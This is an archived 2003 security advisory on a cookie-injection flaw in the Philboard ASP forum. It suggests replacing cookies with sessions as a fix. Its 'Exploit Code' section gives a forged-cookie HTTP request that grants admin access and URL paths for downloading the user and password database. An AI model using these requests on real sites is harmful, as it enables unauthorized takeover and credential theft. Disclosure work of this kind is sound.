Philboard Vulnerability Severity : High (Possible gain administrator/users access on Forum Board) Systems Affected: Philboard up to v1.14 Vendor URL: http://www.youngpip.com/philboard.asp Vuln Type : Cookie Injection Status : Vendor contacted, fixed version is not available (cause they didn't response) Author : AresU Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka, and All 1ndonesian Security Team (1st) #romanceat_private http://www.bosen.net/releases/ Summary ======= Philboard is freeware forum application under ASP Scripts. Vulnerable script is on cookie management, all most script is vulnerable for cookie injection. The cookies are "philboard_admin=True;" or "admin=True;" Acknowledgments =============== Vulnerability discovery and advisory by AresU Vendor Response =============== Vendor has contacted and fixed version is not available (cause they didn't reponse) To Fix the script, you must change every cookie command in to session command. Exploit Code ============ 1) Login Administrator Forum: Use your telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: target.com Cookie: philboard_admin=True; 2) Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or http://www.target.com/forum/database/philboard.mdb ----------------------------------------------- This mail sent through http://webmail.bosen.net
This archive was generated by hypermail 2b30 : Thu May 29 2003 - 23:15:48 PDT